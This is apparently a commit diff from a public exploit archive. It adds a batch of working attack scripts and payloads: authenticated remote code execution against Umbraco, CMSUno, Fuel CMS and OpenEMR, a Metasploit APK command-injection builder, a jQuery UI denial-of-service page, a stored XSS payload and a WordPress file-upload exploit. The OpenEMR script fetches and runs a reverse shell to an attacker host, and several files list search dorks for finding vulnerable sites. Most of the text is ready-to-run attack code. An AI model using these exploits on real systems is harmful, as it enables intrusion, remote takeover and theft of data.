DB: 2021-01-29

10 changes to exploits/shellcodes jQuery UI 1.12.1 - Denial of Service (DoS) Metasploit Framework 6.0.11 - msfvenom APK template command injection fuelCMS 1.4.1 - Remote Code Execution fuel CMS 1.4.1 - Remote Code Execution (1) OpenEMR 5.0.1 - Remote Code Execution OpenEMR 5.0.1 - Remote Code Execution (1) EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting CMSUno 1.6.2 - 'lang/user' Remote Code Execution (Authenticated) OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2) Fuel CMS 1.4.1 - Remote Code Execution (2) Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution
2021-01-29 05:01:58 +00:00 · 2021-01-29 05:01:58 +00:00 · 82075ed5ca
commit 82075ed5ca
parent f268b6f221
11 changed files with 501 additions and 4 deletions
--- a/exploits/aspx/webapps/49488.py
+++ b/exploits/aspx/webapps/49488.py
@ -0,0 +1,68 @@
+# Exploit Title: Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) 
+# Date: 2020-03-28
+# Exploit Author: Alexandre ZANNI (noraj)
+# Based on: https://www.exploit-db.com/exploits/46153
+# Vendor Homepage: http://www.umbraco.com/
+# Software Link: https://our.umbraco.com/download/releases
+# Version: 7.12.4
+# Category: Webapps
+# Tested on: Windows IIS
+# Example: python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig
+
+import requests
+import re
+import argparse
+
+from bs4 import BeautifulSoup
+
+parser = argparse.ArgumentParser(prog='exploit.py',
+    description='Umbraco authenticated RCE',
+    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=80))
+parser.add_argument('-u', '--user', metavar='USER', type=str,
+    required=True, dest='user', help='username / email')
+parser.add_argument('-p', '--password', metavar='PASS', type=str,
+    required=True, dest='password', help='password')
+parser.add_argument('-i', '--host', metavar='URL', type=str, required=True,
+    dest='url', help='root URL')
+parser.add_argument('-c', '--command', metavar='CMD', type=str, required=True,
+    dest='command', help='command')
+parser.add_argument('-a', '--arguments', metavar='ARGS', type=str, required=False,
+    dest='arguments', help='arguments', default='')
+args = parser.parse_args()
+
+# Payload
+payload = """\
+<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "%s"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true;  proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; }  </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>\
+""" % (args.arguments, args.command)
+
+login = args.user
+password = args.password
+host = args.url
+
+# Process Login
+url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
+loginfo = { "username": login, "password": password}
+s = requests.session()
+r2 = s.post(url_login,json=loginfo)
+
+# Go to vulnerable web page
+url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
+r3 = s.get(url_xslt)
+
+soup = BeautifulSoup(r3.text, 'html.parser')
+VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
+VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
+UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
+headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}
+data = { "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE,
+    "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR,
+    "ctl00$body$xsltSelection": payload,
+    "ctl00$body$contentPicker$ContentIdValue": "",
+    "ctl00$body$visualizeDo": "Visualize+XSLT" }
+
+# Launch the attack
+r4 = s.post(url_xslt, data=data, headers=headers)
+# Filter output
+soup = BeautifulSoup(r4.text, 'html.parser')
+CMDOUTPUT = soup.find(id="result").getText()
+print(CMDOUTPUT)
--- a/exploits/linux/webapps/47138.py
+++ b/exploits/linux/webapps/47138.py
@ -1,4 +1,4 @@
-# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
+# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
 # Date: 2019-07-19
 # Exploit Author: 0xd0ff9
 # Vendor Homepage: https://www.getfuelcms.com/
--- a/exploits/multiple/dos/49489.html
+++ b/exploits/multiple/dos/49489.html
@ -0,0 +1,36 @@
+# Exploit Title: jQuery UI 1.12.1 - Denial of Service (DoS)
+# Date: 20 Jan, 2021
+# Exploit Author: Rafael Cintra Lopes
+# Vendor Homepage: https://jqueryui.com/
+# Software Link: https://jqueryui.com/download/
+# Version: <= 1.12.1
+# CVE : CVE-2020-28488
+
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>DoS - jQuery UI 1.12.1</title>
+</head>
+<body>
+    <h2>DoS - jQuery UI 1.12.1</h2>
+
+    <div>
+        <button onclick="exploit()">Exploit</button>
+    </div>
+
+    <p>PoC by Rafael Cintra Lopes</p>
+
+    <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
+    <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>
+
+    <script>
+        function exploit(){
+            for (var i = 0; i < 10; i++) {
+                $("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
+            }
+        }
+    </script>
+</body>
+</html>
--- a/exploits/multiple/local/49491.py
+++ b/exploits/multiple/local/49491.py
@ -0,0 +1,49 @@
+# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection
+# Exploit Author: Justin Steven
+# Vendor Homepage: https://www.metasploit.com/
+# Software Link: https://www.metasploit.com/
+# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0
+# CVE : CVE-2020-7384
+
+#!/usr/bin/env python3
+import subprocess
+import tempfile
+import os
+from base64 import b64encode
+
+# Change me
+payload = 'echo "Code execution as $(id)" > /tmp/win'
+
+# b64encode to avoid badchars (keytool is picky)
+payload_b64 = b64encode(payload.encode()).decode()
+dname = f"CN='|echo {payload_b64} | base64 -d | sh #"
+
+print(f"[+] Manufacturing evil apkfile")
+print(f"Payload: {payload}")
+print(f"-dname: {dname}")
+print()
+
+tmpdir = tempfile.mkdtemp()
+apk_file = os.path.join(tmpdir, "evil.apk")
+empty_file = os.path.join(tmpdir, "empty")
+keystore_file = os.path.join(tmpdir, "signing.keystore")
+storepass = keypass = "password"
+key_alias = "signing.key"
+
+# Touch empty_file
+open(empty_file, "w").close()
+
+# Create apk_file
+subprocess.check_call(["zip", "-j", apk_file, empty_file])
+
+# Generate signing key with malicious -dname
+subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,
+                       "-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])
+
+# Sign APK using our malicious dname
+subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,
+                       "-storepass", storepass, "-keypass", keypass, apk_file, key_alias])
+
+print()
+print(f"[+] Done! apkfile is at {apk_file}")
+print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")
--- a/exploits/php/webapps/48515.py
+++ b/exploits/php/webapps/48515.py
@ -1,4 +1,4 @@
-# Title: OpenEMR 5.0.1 - Remote Code Execution
+# Title: OpenEMR 5.0.1 - Remote Code Execution (1)
 # Exploit Author: Musyoka Ian
 # Date: 2020-05-25
 # Title: OpenEMR < 5.0.1 - Remote Code Execution
--- a/exploits/php/webapps/49484.txt
+++ b/exploits/php/webapps/49484.txt
@ -0,0 +1,12 @@
+# Exploit Title: EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting
+# Exploit Author: Mahendra Purbia
+# Vendor Homepage: http://egavilanmedia.com
+# Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/
+# Version: 1.0
+# Tested on: Windows 10
+
+Vulnerable Parameters: Full Name
+Steps for reproduce:
+ 1. go to http://localhost/PHPCRUD/
+ 2. now click on "add new record" and fill the details (in first name name use :"><svg onload=alert(1)// )
+ 3. Now reload the page and you will see that our XSS payload executed . Its an Stored XSS.
--- a/exploits/php/webapps/49485.rb
+++ b/exploits/php/webapps/49485.rb
@ -0,0 +1,125 @@
+# Exploit Title: CMSUno 1.6.2 - 'lang/user' Remote Code Execution (Authenticated)
+# Google Dorks:
+#   inurl:uno/central.php
+#   inurl:uno/config.php
+#   inurl:uno.php intitle:"CMSUno - Login"
+# Exploit Author: noraj (Alexandre ZANNI) for SEC-IT (https://secit.fr) https://www.exploit-db.com/?author=10066
+# Vendor Homepage: https://www.boiteasite.fr/cmsuno.html
+# Software Link: https://github.com/boiteasite/cmsuno/archive/1.6.2.tar.gz
+# Version: 1.6.1, 1.6.2
+# Tested on: docker image: php:7.4-apache (Debian buster)
+# CVE : CVE-2020-25557 & CVE-2020-25538
+
+# Vulnerabilities
+## Discoverer: Fatih Çelik
+## Discoverer website: https://fatihhcelik.blogspot.com
+## Vulnerability 1:
+##   Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)
+##   CVE: CVE-2020-25557
+##   References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html
+## Vulnerability 2:
+##   Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)
+##   CVE: CVE-2020-25538
+##   References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html
+
+#!/usr/bin/env ruby
+
+require 'httpclient'
+require 'docopt'
+
+# username = 'cmsuno'
+# password = '654321'
+# root_url = 'http://localhost:5000/'
+# command = 'pwd'
+
+doc = <<~DOCOPT
+  CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated)
+
+  Usage:
+    #{__FILE__} -r <url> -c <cmd> [-u <username>] [-p <password>] [-t <tech>] [--debug]
+    #{__FILE__} -H | --help
+
+  Options:
+    -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder
+    -u <username>, --user <username>      user name (if not default: cmsuno)
+    -p <password>, --pass <password>      User password (if not default: 654321)
+    -c <cmd>, --command <cmd>             Command to execute on the target
+    -t <tehc>, --technique <tech>         Technique: exploiting 'user' param (default, with output) or 'lang' param (blind)
+    --debug                               Display arguments
+    -h, --help                            Show this screen
+
+  Examples:
+    #{__FILE__} -r http://example.org -c id
+    #{__FILE__} -r https://example.org:5000/cmsuno -c 'touch hackproof' -u john -p admin1234 -t lang
+DOCOPT
+
+# Get anti-CSRF token
+def get_unox(client, auth_status)
+  print '[*] Fetching anti-CSRF token: '
+  res = client.get(LOGIN_URL)
+  case auth_status
+  when false
+    regexp = /name="unox" value="([a-f0-9]{32}?)"/
+  when true
+    regexp = /Unox='([a-f0-9]{32}?)'/
+  end
+  token = regexp.match(res.body).captures[0].chomp
+  puts token
+  return token
+end
+
+def login(client, user, pass)
+  data = {
+    'unox' => get_unox(client, false),
+    'user' => user,
+    'pass' => pass,
+  }
+  puts '[*] Logging in'
+  res = client.post(LOGIN_URL, data)
+  return res.body
+end
+
+def exploit(client, user, pass, cmd, tech)
+  payload = "#{user}\";$pass='#{pass}';system('#{cmd}');?>// "
+  case tech
+  when 'user'
+    data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=#{user}&pass0=#{pass}&user=#{payload}&pass=#{pass}&lang=en"
+  when 'lang'
+    data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=&pass0=&user=&pass=&lang=#{payload}"
+  else
+    raise 'Wrong exploitation technique argument value'
+  end
+  headers = {
+    'X-Requested-With' => 'XMLHttpRequest'
+  }
+  #client.proxy = 'http://localhost:8080'
+  puts "[*] Starting exploitation, using '#{tech}' param technique"
+  client.post(VULNERABLE_URL, data, headers)
+  # Login again to trigger uno/password.php
+  clnt2 = HTTPClient.new
+  return login(clnt2, user, pass).lines[..-2].join
+end
+
+begin
+  args = Docopt.docopt(doc)
+  pp args if args['--debug']
+
+  username = args['--user'] || 'cmsuno'
+  password = args['--pass'] || '654321'
+  technique = args['--technique'] || 'user'
+  LOGIN_URL = "#{args['--root-url']}/uno.php"
+  VULNERABLE_URL = "#{args['--root-url']}/uno/central.php"
+
+  clnt = HTTPClient.new
+  login(clnt, username, password)
+  output = exploit(clnt, username, password, args['--command'], technique)
+  print '[*] Command output:'
+  case technique
+  when 'user'
+    puts "\n#{output}"
+  when 'lang'
+    puts ' blind RCE, no output with this exploitation technique'
+  end
+rescue Docopt::Exit => e
+  puts e.message
+end
--- a/exploits/php/webapps/49486.rb
+++ b/exploits/php/webapps/49486.rb
@ -0,0 +1,98 @@
+# Title: OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2)
+# Exploit Author: Alexandre ZANNI
+# Date: 2020-07-16
+# Vendor Homepage: https://www.open-emr.org/
+# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
+# Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile 
+# Version: < 5.0.1 (Patch 4)
+# Tested on: Ubuntu 18.04, OpenEMR Version 5.0.1.3
+# References: https://www.exploit-db.com/exploits/48515
+
+#!/usr/bin/env ruby
+
+require 'httpclient'
+require 'docopt'
+
+shell_name = 'shell4.php'
+user = 'openemr_admin'
+password = 'xxxxxx'
+payload = 'php/reverse_php'
+lhost = '10.10.15.201'
+lport = 8888
+
+doc = <<~DOCOPT
+  OpenEMR <= 5.0.1 - (Authenticated) Remote Code Execution
+
+  Usage:
+    #{__FILE__} manual --root-url <url> --shell <filename> --user <username> --password <password> [--debug]
+    #{__FILE__} semi-auto --root-url <url> --user <username> --password <password> --payload <payload> --lhost <host> --lport <port> [--debug]
+    #{__FILE__} auto --root-url <url> --user <username> --password <password> --lhost <host> --lport <port> [--debug]
+    #{__FILE__} -H | --help
+
+  Options:
+    -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder
+    -s <filename>, --shell <filename>     Filename of the PHP reverse shell payload
+    -u <username>, --user <username>      Username of the admin
+    -p <password>, --password <password>  Password of the admin
+    -m <payload>, --payload <payload>     Metasploit PHP payload
+    -h <host>, --lhost <host>             Reverse shell local host
+    -t <port>, --lport <port>             Reverse shell local port
+    --debug                               Display arguments
+    -H, --help                            Show this screen
+
+  Examples:
+    #{__FILE__} manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123
+    #{__FILE__} semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888
+    #{__FILE__} auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999
+DOCOPT
+
+begin
+  args = Docopt.docopt(doc)
+  pp args if args['--debug']
+  if args['manual']
+    shell_name = File.basename(args['--shell'])
+    shell_path = args['--shell']
+  else
+    shell_name = "tmp#{rand(1000)}.php"
+    shell_path = shell_name
+  end
+  if args['semi-auto']
+    payload = args['--payload']
+  else
+    payload = 'php/reverse_php'
+  end
+  # Authentication data
+  uri_1 = URI("#{args['--root-url']}/interface/main/main_screen.php?auth=login&site=default")
+  data_1= {
+    'new_login_session_management' => '1',
+    'authProvider' => 'Default',
+    'authUser' => args['--user'],
+    'clearPass' => args['--password'],
+    'languageChoice' => '1'
+  }
+  # Reverse shell data
+  unless args['manual']
+    puts "[+] Generating the reverse shell payload: #{shell_name}"
+    %x(msfvenom -p #{payload} LHOST=#{args['--lhost']} LPORT=#{args['--lport']} -f raw > #{shell_name})
+  end
+  data_2 = {
+    'site' => 'default',
+    'mode' => 'save',
+    'docid' => shell_name,
+    'content' => File.read(shell_path)}
+  uri_2 = URI("#{args['--root-url']}/portal/import_template.php?site=default")
+  uri_3 = URI("#{args['--root-url']}/portal/#{shell_name}")
+
+  clnt = HTTPClient.new
+
+  puts '[+] Authenticating'
+  clnt.post(uri_1, data_1)
+
+  puts '[+] Uploading the reverse shell'
+  clnt.post(uri_2, data_2)
+
+  puts "[+] Executing the reverse shell: #{args['--root-url']}/portal/#{shell_name}"
+  clnt.get(uri_3)
+rescue Docopt::Exit => e
+  puts e.message
+end
--- a/exploits/php/webapps/49487.rb
+++ b/exploits/php/webapps/49487.rb
@ -0,0 +1,51 @@
+# Title: Fuel CMS 1.4.1 - Remote Code Execution (2)
+# Exploit Author: Alexandre ZANNI
+# Date: 2020-11-14
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
+# Version: <= 1.4.1
+# Tested on: Ubuntu 16.04
+# CVE : CVE-2018-16763
+# References: https://www.exploit-db.com/exploits/47138
+
+#!/usr/bin/env ruby
+
+require 'httpclient'
+require 'docopt'
+
+# dirty workaround to ignore Max-Age
+# https://github.com/nahi/httpclient/issues/242#issuecomment-69013932
+$VERBOSE = nil
+
+doc = <<~DOCOPT
+  Fuel CMS 1.4 - Remote Code Execution
+
+  Usage:
+    #{__FILE__} <url> <cmd>
+    #{__FILE__} -h | --help
+
+  Options:
+    <url>         Root URL (base path) including HTTP scheme, port and root folder
+    <cmd>         The system command to execute
+    -h, --help    Show this screen
+
+  Examples:
+    #{__FILE__} http://example.org id
+    #{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd'
+DOCOPT
+
+def exploit(client, root_url, cmd)
+  url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'"
+
+  res = client.get(url)
+
+  /system(.+?)<div/mx.match(res.body).captures[0].chomp
+end
+
+begin
+  args = Docopt.docopt(doc)
+  clnt = HTTPClient.new
+  puts exploit(clnt, args['<url>'], args['<cmd>'])
+rescue Docopt::Exit => e
+  puts e.message
+end
--- a/exploits/php/webapps/49490.txt
+++ b/exploits/php/webapps/49490.txt
@ -0,0 +1,50 @@
+# Exploit Title: WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution
+# Exploit Author: ABDO10
+# Date : Jan - 28 - 2021
+# Google Dork : inurl:"/wp-content/plugins/super-forms/"
+# Vendor Homepage : https://renstillmann.github.io/super-forms/#/
+# Version : All (<= 4.9.X)
+# data in http request :
+
+POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1
+ <=== exploit end point
+Host: localhost
+User-Agent: UserAgent
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------423513681827540048931513055996
+Content-Length: 7058
+Origin: localhost
+Connection: close
+Referer: localhost
+Cookie: 
+
+-----------------------------423513681827540048931513055996
+Content-Disposition: form-data; name="accept_file_types"
+
+jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF                        <=======
+inject extension (|PHP4) to validate file to upload
+-----------------------------423513681827540048931513055996
+Content-Disposition: form-data; name="max_file_size"
+
+8000000
+-----------------------------423513681827540048931513055996
+Content-Disposition: form-data; name="image_library"
+
+0
+-----------------------------423513681827540048931513055996
+Content-Disposition: form-data; name="files[]";
+filename="filename.(extension)"    <====   inject code extension (.php4)
+for example
+Content-Type: application/pdf
+
+Evil codes to be uploaded
+
+-----------------------------423513681827540048931513055996--
+
+# Uploaded Malicious File can  be Found in :
+/wp-content/uploads/superforms/2021/01/<id>/filename.php4
+u can get <id> from server reply .
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6767,6 +6767,7 @@ id,file,description,date,author,type,platform,port
 49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
 49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",2020-12-17,"Guillaume PETIT",dos,multiple,
 49337,exploits/windows/dos/49337.py,"Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)",2021-01-04,stresser,dos,windows,
+49489,exploits/multiple/dos/49489.html,"jQuery UI 1.12.1 - Denial of Service (DoS)",2021-01-28,"Rafael Cintra Lopes",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -11245,6 +11246,7 @@ id,file,description,date,author,type,platform,port
 49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java,
 49409,exploits/windows/local/49409.py,"PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval",2021-01-11,rootabeta,local,windows,
 49453,exploits/windows/local/49453.txt,"Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation",2021-01-22,LiquidWorm,local,windows,
+49491,exploits/multiple/local/49491.py,"Metasploit Framework 6.0.11 - msfvenom APK template command injection",2021-01-28,"Justin Steven",local,multiple,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42518,7 +42520,7 @@ id,file,description,date,author,type,platform,port
 47125,exploits/linux/webapps/47125.txt,"CentOS Control Web Panel 0.9.8.838 - User Enumeration",2019-07-16,"Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak",webapps,linux,
 47132,exploits/linux/webapps/47132.txt,"Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting",2019-07-17,"Sarath Nair",webapps,linux,
 47136,exploits/linux/webapps/47136.txt,"WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting",2019-07-18,LiquidWorm,webapps,linux,
-47138,exploits/linux/webapps/47138.py,"fuelCMS 1.4.1 - Remote Code Execution",2019-07-19,0xd0ff9,webapps,linux,
+47138,exploits/linux/webapps/47138.py,"fuel CMS 1.4.1 - Remote Code Execution (1)",2019-07-19,0xd0ff9,webapps,linux,
 47139,exploits/linux/webapps/47139.txt,"Web Ofisi E-Ticaret 3 - 'a' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
 47140,exploits/linux/webapps/47140.txt,"Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
 47141,exploits/linux/webapps/47141.txt,"Web Ofisi Emlak 2 - 'ara' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
@ -43183,7 +43185,7 @@ id,file,description,date,author,type,platform,port
 48509,exploits/php/webapps/48509.txt,"WordPress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php,
 48511,exploits/php/webapps/48511.txt,"Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting",2020-05-25,"Nitya Nand",webapps,php,
 48512,exploits/php/webapps/48512.txt,"Online Discussion Forum Site 1.0 - Remote Code Execution",2020-05-25,Enesdex,webapps,php,
-48515,exploits/php/webapps/48515.py,"OpenEMR 5.0.1 - Remote Code Execution",2020-05-26,"Musyoka Ian",webapps,php,
+48515,exploits/php/webapps/48515.py,"OpenEMR 5.0.1 - Remote Code Execution (1)",2020-05-26,"Musyoka Ian",webapps,php,
 48516,exploits/php/webapps/48516.txt,"Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated)",2020-05-26,"Kamaljeet Kumar",webapps,php,
 48518,exploits/php/webapps/48518.txt,"Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)",2020-05-26,"Mehmet Kelepçe",webapps,php,
 48519,exploits/linux/webapps/48519.py,"Pi-hole 4.4.0 - Remote Code Execution (Authenticated)",2020-05-26,Photubias,webapps,linux,
@ -43677,3 +43679,9 @@ id,file,description,date,author,type,platform,port
 49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated)",2021-01-27,SunCSR,webapps,multiple,
 49481,exploits/ruby/webapps/49481.txt,"STVS ProVision 5.9.10 - File Disclosure (Authenticated)",2021-01-27,LiquidWorm,webapps,ruby,
 49482,exploits/ruby/webapps/49482.html,"STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)",2021-01-27,LiquidWorm,webapps,ruby,
+49484,exploits/php/webapps/49484.txt,"EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting",2021-01-28,"Mahendra Purbia",webapps,php,
+49485,exploits/php/webapps/49485.rb,"CMSUno 1.6.2 - 'lang/user' Remote Code Execution (Authenticated)",2021-01-28,"Alexandre ZANNI",webapps,php,
+49486,exploits/php/webapps/49486.rb,"OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2)",2021-01-28,"Alexandre ZANNI",webapps,php,
+49487,exploits/php/webapps/49487.rb,"Fuel CMS 1.4.1 - Remote Code Execution (2)",2021-01-28,"Alexandre ZANNI",webapps,php,
+49488,exploits/aspx/webapps/49488.py,"Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)",2021-01-28,"Alexandre ZANNI",webapps,aspx,
+49490,exploits/php/webapps/49490.txt,"WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution",2021-01-28,ABDO10,webapps,php,